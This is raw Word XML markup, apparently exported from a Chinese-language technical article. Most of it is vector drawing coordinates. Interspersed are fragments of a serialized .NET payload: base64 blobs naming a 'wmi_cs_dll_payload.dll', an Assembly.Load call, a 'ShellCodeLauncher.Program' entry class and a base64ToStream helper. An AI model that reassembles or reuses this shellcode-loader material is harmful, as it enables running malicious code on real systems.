2800,12400,2800,12399,2800,12398,2800,12396,2800,12395,2800,12394,2800,12392,2800,12391,2800,12389,2800,12388,2800,12386,2800,12384,2800,12382,2800,12381,2800,12379,2800,12377,2800,12375,2800,12373,2800,12371,2800,12368,2800,12366,2800,12364,2800,12361,2800,12359,2800,12356,2800,12354,2800,12351,2800,12348,2800,12346,2800,12343,2800,12340,2800,12337,2800,12334,2800,12331,2800,12327,2800,12324,2800,12321,2800,12317,2800,12314,2800,12310,2800,12306,2800,12302,2800,12298,2800,12295,2800,12290,2800,12286,2800,12282,2800,12278,2800,12273,2800,12269,2800,12264,2800,12260,2800,12255,2800,12250,2800,12245,2800,12240,2800,12235,2800,12230,2800,12224,2800,12219,2800,12213,2800,12208,2800,12202,2800,12196,2800,12190,2800,12184,2800,12178,2800,12172,2800,12165e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:638.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,12770" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:12770;width:130;height:270" coordorigin="2790,12770" coordsize="130,270" path="m2800,12795l2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2800,12795,2801,12795,2801,12795,2801,12795,2801,12795,2801,12795,2801,12795,2801,12795,2801,12795,2801,12795,2801,12795,2801,12795,2801,12795,2801,12795,2801,12795,2802,12795,2802,12795,2802,12795,2802,12795,2802,12795,2802,12795,2803,12795,2803,12795,2803,12795,2803,12795,2803,12795,2804,12795,2804,12795,2804,12795,2805,12795,2805,12795,2805,12795,2806,12795,2806,12795,2806,12795,2807,12795,2807,12795,2808,12795,2808,12795,2809,12795,2809,12795,2810,12795,2810,12795,2811,12795,2812,12795,2812,12795,2813,12795,2814,12795,2814,12795,2815,12795,2816,12795,2817,12795,2817,12795,2818,12795,2819,12795,2820,12795,2821,12795,2822,12795,2823,12795,2824,12795,2825,12795,2826,12795,2827,12795,2828,12795,2829,12795,2830,12795,2832,12795,2833,12795,2834,12795,2836,12795,2837,12795,2838,12795,2840,12795,2841,12795,2843,12795,2844,12795,2846,12795,2847,12795,2849,12795,2851,12795,2852,12795,2854,12795,2856,12795,2858,12795,2860,12795,2861,12795,2863,12795,2865,12795,2867,12795,2870,12795,2872,12795,2874,12795,2876,12795,2878,12795,2881,12795,2883,12795,2885,12795,2888,12795,2890,12795,2893,12795,2895,12795,2898,12795,2901,12795,2903,12795,2906,12795,2909,12795,2912,12795,2915,12795,2917,12795,2920,12795,2920,12795,2920,12795,2920,12795,2920,12795,2920,12795,2920,12795,2920,12795,2920,12795,2920,12796,2920,12796,2920,12796,2920,12796,2920,12796,2920,12796,2920,12796,2920,12796,2920,12796,2920,12796,2920,12796,2920,12796,2920,12797,2920,12797,2920,12797,2920,12797,2920,12798,2920,12798,2920,12798,2920,12798,2920,12799,2920,12799,2920,12800,2920,12800,2920,12800,2920,12801,2920,12801,2920,12802,2920,12803,2920,12803,2920,12804,2920,12804,2920,12805,2920,12806,2920,12807,2920,12807,2920,12808,2920,12809,2920,12810,2920,12811,2920,12812,2920,12813,2920,12814,2920,12816,2920,12817,2920,12818,2920,12819,2920,12821,2920,12822,2920,12823,2920,12825,2920,12827,2920,12828,2920,12830,2920,12832,2920,12833,2920,12835,2920,12837,2920,12839,2920,12841,2920,12843,2920,12845,2920,12847,2920,12850,2920,12852,2920,12854,2920,12857,2920,12859,2920,12862,2920,12865,2920,12867,2920,12870,2920,12873,2920,12876,2920,12879,2920,12882,2920,12885,2920,12888,2920,12892,2920,12895,2920,12899,2920,12902,2920,12906,2920,12910,2920,12913,2920,12917,2920,12921,2920,12925,2920,12929,2920,12934,2920,12938,2920,12942,2920,12947,2920,12951,2920,12956,2920,12961,2920,12966,2920,12971,2920,12976,2920,12981,2920,12986,2920,12992,2920,12997,2920,13003,2920,13008,2920,13014,2920,13020,2920,13026,2920,13032,2920,13038,2920,13044,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2920,13051,2919,13051,2919,13051,2919,13051,2919,13051,2919,13051,2919,13051,2919,13051,2918,13051,2918,13051,2918,13051,2918,13051,2917,13051,2917,13051,2917,13051,2917,13051,2916,13051,2916,13051,2916,13051,2915,13051,2915,13051,2914,13051,2914,13051,2914,13051,2913,13051,2913,13051,2912,13051,2912,13051,2911,13051,2910,13051,2910,13051,2909,13051,2909,13051,2908,13051,2907,13051,2907,13051,2906,13051,2905,13051,2904,13051,2903,13051,2903,13051,2902,13051,2901,13051,2900,13051,2899,13051,2898,13051,2897,13051,2896,13051,2895,13051,2894,13051,2893,13051,2892,13051,2890,13051,2889,13051,2888,13051,2887,13051,2885,13051,2884,13051,2883,13051,2881,13051,2880,13051,2878,13051,2877,13051,2875,13051,2874,13051,2872,13051,2870,13051,2869,13051,2867,13051,2865,13051,2863,13051,2861,13051,2859,13051,2857,13051,2855,13051,2853,13051,2851,13051,2849,13051,2847,13051,2845,13051,2843,13051,2840,13051,2838,13051,2836,13051,2833,13051,2831,13051,2828,13051,2826,13051,2823,13051,2820,13051,2818,13051,2815,13051,2812,13051,2809,13051,2806,13051,2803,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13050,2800,13050,2800,13050,2800,13050,2800,13050,2800,13050,2800,13050,2800,13050,2800,13050,2800,13050,2800,13050,2800,13050,2800,13049,2800,13049,2800,13049,2800,13049,2800,13048,2800,13048,2800,13048,2800,13048,2800,13047,2800,13047,2800,13046,2800,13046,2800,13046,2800,13045,2800,13045,2800,13044,2800,13044,2800,13043,2800,13042,2800,13042,2800,13041,2800,13040,2800,13039,2800,13039,2800,13038,2800,13037,2800,13036,2800,13035,2800,13034,2800,13033,2800,13032,2800,13030,2800,13029,2800,13028,2800,13027,2800,13025,2800,13024,2800,13023,2800,13021,2800,13019,2800,13018,2800,13016,2800,13014,2800,13013,2800,13011,2800,13009,2800,13007,2800,13005,2800,13003,2800,13001,2800,12999,2800,12996,2800,12994,2800,12992,2800,12989,2800,12987,2800,12984,2800,12981,2800,12979,2800,12976,2800,12973,2800,12970,2800,12967,2800,12964,2800,12961,2800,12958,2800,12954,2800,12951,2800,12947,2800,12944,2800,12940,2800,12936,2800,12933,2800,12929,2800,12925,2800,12921,2800,12917,2800,12912,2800,12908,2800,12904,2800,12899,2800,12895,2800,12890,2800,12885,2800,12880,2800,12875,2800,12870,2800,12865,2800,12860,2800,12855,2800,12849,2800,12844,2800,12838,2800,12832,2800,12826,2800,12820,2800,12814,2800,12808,2800,12802,2800,12795e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:202.500pt;margin-top:675.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4050,13510" coordsize="130,270">
        <v:shape style="position:absolute;left:4050;top:13510;width:130;height:270" coordorigin="4050,13510" coordsize="130,270" path="m4076,13531l4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4076,13531,4077,13531,4077,13531,4077,13531,4077,13531,4077,13531,4077,13531,4077,13531,4077,13531,4077,13531,4078,13531,4078,13531,4078,13531,4078,13531,4078,13531,4079,13531,4079,13531,4079,13531,4079,13531,4080,13531,4080,13531,4080,13531,4081,13531,4081,13531,4081,13531,4082,13531,4082,13531,4083,13531,4083,13531,4083,13531,4084,13531,4084,13531,4085,13531,4086,13531,4086,13531,4087,13531,4087,13531,4088,13531,4089,13531,4089,13531,4090,13531,4091,13531,4091,13531,4092,13531,4093,13531,4094,13531,4095,13531,4096,13531,4097,13531,4097,13531,4098,13531,4099,13531,4100,13531,4102,13531,4103,13531,4104,13531,4105,13531,4106,13531,4107,13531,4109,13531,4110,13531,4111,13531,4113,13531,4114,13531,4115,13531,4117,13531,4118,13531,4120,13531,4121,13531,4123,13531,4125,13531,4126,13531,4128,13531,4130,13531,4132,13531,4133,13531,4135,13531,4137,13531,4139,13531,4141,13531,4143,13531,4145,13531,4147,13531,4149,13531,4152,13531,4154,13531,4156,13531,4159,13531,4161,13531,4163,13531,4166,13531,4168,13531,4171,13531,4173,13531,4176,13531,4179,13531,4182,13531,4184,13531,4187,13531,4190,13531,4193,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13531,4196,13532,4196,13532,4196,13532,4196,13532,4196,13532,4196,13532,4196,13533,4196,13533,4196,13533,4196,13533,4196,13534,4196,13534,4196,13535,4196,13535,4196,13535,4196,13536,4196,13536,4196,13537,4196,13537,4196,13538,4196,13538,4196,13539,4196,13540,4196,13541,4196,13541,4196,13542,4196,13543,4196,13544,4196,13545,4196,13546,4196,13547,4196,13548,4196,13549,4196,13550,4196,13551,4196,13552,4196,13553,4196,13555,4196,13556,4196,13557,4196,13559,4196,13560,4196,13562,4196,13564,4196,13565,4196,13567,4196,13569,4196,13571,4196,13572,4196,13574,4196,13576,4196,13578,4196,13581,4196,13583,4196,13585,4196,13587,4196,13590,4196,13592,4196,13595,4196,13597,4196,13600,4196,13603,4196,13605,4196,13608,4196,13611,4196,13614,4196,13617,4196,13621,4196,13624,4196,13627,4196,13631,4196,13634,4196,13638,4196,13641,4196,13645,4196,13649,4196,13653,4196,13657,4196,13661,4196,13665,4196,13669,4196,13673,4196,13678,4196,13682,4196,13687,4196,13691,4196,13696,4196,13701,4196,13706,4196,13711,4196,13716,4196,13722,4196,13727,4196,13732,4196,13738,4196,13744,4196,13749,4196,13755,4196,13761,4196,13767,4196,13773,4196,13780,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4196,13786,4195,13786,4195,13786,4195,13786,4195,13786,4195,13786,4195,13786,4195,13786,4195,13786,4194,13786,4194,13786,4194,13786,4194,13786,4194,13786,4193,13786,4193,13786,4193,13786,4193,13786,4192,13786,4192,13786,4192,13786,4191,13786,4191,13786,4190,13786,4190,13786,4190,13786,4189,13786,4189,13786,4188,13786,4188,13786,4187,13786,4187,13786,4186,13786,4186,13786,4185,13786,4184,13786,4184,13786,4183,13786,4182,13786,4181,13786,4181,13786,4180,13786,4179,13786,4178,13786,4177,13786,4177,13786,4176,13786,4175,13786,4174,13786,4173,13786,4172,13786,4171,13786,4170,13786,4168,13786,4167,13786,4166,13786,4165,13786,4164,13786,4162,13786,4161,13786,4160,13786,4158,13786,4157,13786,4155,13786,4154,13786,4152,13786,4151,13786,4149,13786,4148,13786,4146,13786,4144,13786,4142,13786,4141,13786,4139,13786,4137,13786,4135,13786,4133,13786,4131,13786,4129,13786,4127,13786,4125,13786,4123,13786,4121,13786,4118,13786,4116,13786,4114,13786,4111,13786,4109,13786,4106,13786,4104,13786,4101,13786,4099,13786,4096,13786,4093,13786,4091,13786,4088,13786,4085,13786,4082,13786,4079,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13786,4076,13785,4076,13785,4076,13785,4076,13785,4076,13785,4076,13785,4076,13785,4076,13784,4076,13784,4076,13784,4076,13784,4076,13783,4076,13783,4076,13783,4076,13782,4076,13782,4076,13781,4076,13781,4076,13781,4076,13780,4076,13779,4076,13779,4076,13778,4076,13778,4076,13777,4076,13776,4076,13776,4076,13775,4076,13774,4076,13773,4076,13772,4076,13771,4076,13770,4076,13769,4076,13768,4076,13767,4076,13766,4076,13765,4076,13763,4076,13762,4076,13761,4076,13759,4076,13758,4076,13756,4076,13755,4076,13753,4076,13752,4076,13750,4076,13748,4076,13746,4076,13744,4076,13742,4076,13740,4076,13738,4076,13736,4076,13734,4076,13732,4076,13729,4076,13727,4076,13725,4076,13722,4076,13719,4076,13717,4076,13714,4076,13711,4076,13708,4076,13705,4076,13702,4076,13699,4076,13696,4076,13693,4076,13690,4076,13686,4076,13683,4076,13679,4076,13676,4076,13672,4076,13668,4076,13664,4076,13660,4076,13656,4076,13652,4076,13648,4076,13643,4076,13639,4076,13635,4076,13630,4076,13625,4076,13621,4076,13616,4076,13611,4076,13606,4076,13600,4076,13595,4076,13590,4076,13584,4076,13579,4076,13573,4076,13567,4076,13562,4076,13556,4076,13550,4076,13543,4076,13537,4076,13531e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:160.500pt;margin-top:747.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3210,14950" coordsize="130,270">
        <v:shape style="position:absolute;left:3210;top:14950;width:130;height:270" coordorigin="3210,14950" coordsize="130,270" path="m3236,14972l3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3236,14972,3237,14972,3237,14972,3237,14972,3237,14972,3237,14972,3237,14972,3238,14972,3238,14972,3238,14972,3238,14972,3238,14972,3239,14972,3239,14972,3239,14972,3240,14972,3240,14972,3240,14972,3241,14972,3241,14972,3241,14972,3242,14972,3242,14972,3243,14972,3243,14972,3244,14972,3244,14972,3245,14972,3245,14972,3246,14972,3246,14972,3247,14972,3247,14972,3248,14972,3249,14972,3250,14972,3250,14972,3251,14972,3252,14972,3253,14972,3253,14972,3254,14972,3255,14972,3256,14972,3257,14972,3258,14972,3259,14972,3260,14972,3261,14972,3262,14972,3263,14972,3264,14972,3266,14972,3267,14972,3268,14972,3269,14972,3271,14972,3272,14972,3273,14972,3275,14972,3276,14972,3278,14972,3279,14972,3281,14972,3283,14972,3284,14972,3286,14972,3288,14972,3289,14972,3291,14972,3293,14972,3295,14972,3297,14972,3299,14972,3301,14972,3303,14972,3305,14972,3307,14972,3309,14972,3311,14972,3313,14972,3316,14972,3318,14972,3320,14972,3323,14972,3325,14972,3328,14972,3330,14972,3333,14972,3336,14972,3338,14972,3341,14972,3344,14972,3347,14972,3350,14972,3353,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14972,3356,14973,3356,14973,3356,14973,3356,14973,3356,14973,3356,14974,3356,14974,3356,14974,3356,14975,3356,14975,3356,14975,3356,14976,3356,14976,3356,14977,3356,14977,3356,14977,3356,14978,3356,14979,3356,14979,3356,14980,3356,14981,3356,14981,3356,14982,3356,14983,3356,14984,3356,14984,3356,14985,3356,14986,3356,14987,3356,14988,3356,14989,3356,14990,3356,14992,3356,14993,3356,14994,3356,14995,3356,14997,3356,14998,3356,15000,3356,15001,3356,15003,3356,15004,3356,15006,3356,15008,3356,15009,3356,15011,3356,15013,3356,15015,3356,15017,3356,15019,3356,15021,3356,15023,3356,15026,3356,15028,3356,15030,3356,15033,3356,15035,3356,15038,3356,15041,3356,15043,3356,15046,3356,15049,3356,15052,3356,15055,3356,15058,3356,15061,3356,15065,3356,15068,3356,15071,3356,15075,3356,15078,3356,15082,3356,15086,3356,15089,3356,15093,3356,15097,3356,15101,3356,15105,3356,15110,3356,15114,3356,15118,3356,15123,3356,15128,3356,15132,3356,15137,3356,15142,3356,15147,3356,15152,3356,15157,3356,15162,3356,15168,3356,15173,3356,15179,3356,15184,3356,15190,3356,15196,3356,15202,3356,15208,3356,15214,3356,15220,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3356,15227,3355,15227,3355,15227,3355,15227,3355,15227,3355,15227,3355,15227,3355,15227,3355,15227,3355,15227,3355,15227,3355,15227,3355,15227,3354,15227,3354,15227,3354,15227,3354,15227,3354,15227,3354,15227,3353,15227,3353,15227,3353,15227,3353,15227,3352,15227,3352,15227,3352,15227,3351,15227,3351,15227,3351,15227,3350,15227,3350,15227,3350,15227,3349,15227,3349,15227,3348,15227,3348,15227,3347,15227,3347,15227,3346,15227,3346,15227,3345,15227,3344,15227,3344,15227,3343,15227,3342,15227,3342,15227,3341,15227,3340,15227,3340,15227,3339,15227,3338,15227,3337,15227,3336,15227,3335,15227,3334,15227,3333,15227,3332,15227,3331,15227,3330,15227,3329,15227,3328,15227,3327,15227,3326,15227,3324,15227,3323,15227,3322,15227,3321,15227,3319,15227,3318,15227,3316,15227,3315,15227,3313,15227,3312,15227,3310,15227,3309,15227,3307,15227,3305,15227,3304,15227,3302,15227,3300,15227,3298,15227,3297,15227,3295,15227,3293,15227,3291,15227,3289,15227,3287,15227,3284,15227,3282,15227,3280,15227,3278,15227,3276,15227,3273,15227,3271,15227,3268,15227,3266,15227,3263,15227,3261,15227,3258,15227,3256,15227,3253,15227,3250,15227,3247,15227,3244,15227,3242,15227,3239,15227,3236,15227,3236,15227,3236,15227,3236,15227,3236,15227,3236,15227,3236,15227,3236,15227,3236,15227,3236,15227,3236,15227,3236,15227,3236,15226,3236,15226,3236,15226,3236,15226,3236,15226,3236,15226,3236,15226,3236,15226,3236,15226,3236,15225,3236,15225,3236,15225,3236,15225,3236,15225,3236,15224,3236,15224,3236,15224,3236,15223,3236,15223,3236,15223,3236,15222,3236,15222,3236,15221,3236,15221,3236,15220,3236,15220,3236,15219,3236,15218,3236,15218,3236,15217,3236,15216,3236,15215,3236,15215,3236,15214,3236,15213,3236,15212,3236,15211,3236,15210,3236,15209,3236,15208,3236,15207,3236,15205,3236,15204,3236,15203,3236,15201,3236,15200,3236,15199,3236,15197,3236,15196,3236,15194,3236,15192,3236,15191,3236,15189,3236,15187,3236,15185,3236,15183,3236,15181,3236,15179,3236,15177,3236,15175,3236,15172,3236,15170,3236,15168,3236,15165,3236,15163,3236,15160,3236,15158,3236,15155,3236,15152,3236,15149,3236,15146,3236,15143,3236,15140,3236,15137,3236,15134,3236,15130,3236,15127,3236,15123,3236,15120,3236,15116,3236,15113,3236,15109,3236,15105,3236,15101,3236,15097,3236,15093,3236,15088,3236,15084,3236,15080,3236,15075,3236,15071,3236,15066,3236,15061,3236,15056,3236,15051,3236,15046,3236,15041,3236,15036,3236,15031,3236,15025,3236,15020,3236,15014,3236,15008,3236,15002,3236,14996,3236,14990,3236,14984,3236,14978,3236,14972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"bABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAABYABcAAQBPAHIAaQBnAGkAbgBhAGwARgBp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AGwAZQBu"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119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"AGEAbQBlAAAAdwBtAGkAXwBjAHMAXwBkAGwAbABfAHAAYQB5AGwAbwBhAGQALgBkAGwA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bAAAAAAA"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"NAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAA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ADgACAAB"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"AEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAA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127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"AAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABA6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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128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129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130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131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132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133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134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63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135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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAA"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48" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="136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136</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="49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"AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3Rl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bS5SZWZs"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+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137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"ZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="19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413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138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entry_class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996c38"/>
          <w:spacing w:val="1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'ShellCodeLauncher.Program'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="29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139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10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>140</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> 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141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setversion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142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stm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base64ToStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14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serialized_obj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680.400pt;width:7.200pt;height:6.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:281.116pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,5622">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:5622" coordorigin="10402,0" coordsize="0,5622" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,9,10402,11,10402,13,10402,16,10402,19,10402,22,10402,26,10402,30,10402,35,10402,40,10402,46,10402,52,10402,58,10402,65,10402,73,10402,81,10402,90,10402,99,10402,109,10402,119,10402,131,10402,143,10402,155,10402,168,10402,183,10402,197,10402,213,10402,229,10402,247,10402,265,10402,284,10402,304,10402,324,10402,346,10402,368,10402,392,10402,417,10402,442,10402,469,10402,496,10402,525,10402,555,10402,585,10402,617,10402,650,10402,685,10402,720,10402,757,10402,795,10402,834,10402,874,10402,916,10402,959,10402,1003,10402,1049,10402,1096,10402,1144,10402,1194,10402,1245,10402,1297,10402,1351,10402,1407,10402,1464,10402,1523,10402,1583,10402,1644,10402,1708,10402,1773,10402,1839,10402,1907,10402,1977,10402,2048,10402,2122,10402,2197,10402,2273,10402,2352,10402,2432,10402,2514,10402,2597,10402,2683,10402,2771,10402,2860,10402,2951,10402,3045,10402,3140,10402,3237,10402,3336,10402,3437,10402,3540,10402,3645,10402,3752,10402,3862,10402,3973,10402,4087,10402,4202,10402,4320,10402,4440,10402,4562,10402,4687,10402,4814,10402,4942,10402,5074,10402,5207,10402,5343,10402,5481,10402,5622e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,670" path="m1510,999l1510,999,1510,999,1510,999,1510,999,1510,999,1510,999,1511,999,1512,999,1512,999,1514,999,1515,999,1517,999,1519,999,1521,999,1524,999,1528,999,1532,999,1536,999,1541,999,1546,999,1552,999,1559,999,1566,999,1575,999,1583,999,1593,999,1603,999,1615,999,1627,999,1640,999,1654,999,1668,999,1684,999,1701,999,1719,999,1738,999,1758,999,1780,999,1802,999,1826,999,1851,999,1877,999,1904,999,1933,999,1963,999,1995,999,2028,999,2063,999,2099,999,2136,999,2175,999,2216,999,2259,999,2303,999,2348,999,2396,999,2445,999,2496,999,2549,999,2604,999,2660,999,2719,999,2779,999,2841,999,2906,999,2972,999,3041,999,3112,999,3184,999,3259,999,3336,999,3416,999,3498,999,3582,999,3668,999,3757,999,3848,999,3941,999,4037,999,4136,999,4236,999,4340,999,4446,999,4555,999,4666,999,4780,999,4897,999,5017,999,5139,999,5264,999,5392,999,5523,999,5657,999,5793,999,5933,999,6076,999,6222,999,6370,999,6522,999,6677,999,6835,999,6997,999,7161,999,7329,999,7500,999,7675,999,7853,999,8034,999,8219,999,8407,999,8598,999,8793,999,8992,999,9194,999,9400,999,9609,999,9823,999,10039,999,10260,999,10484,999,10484,999,10484,999,10484,999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510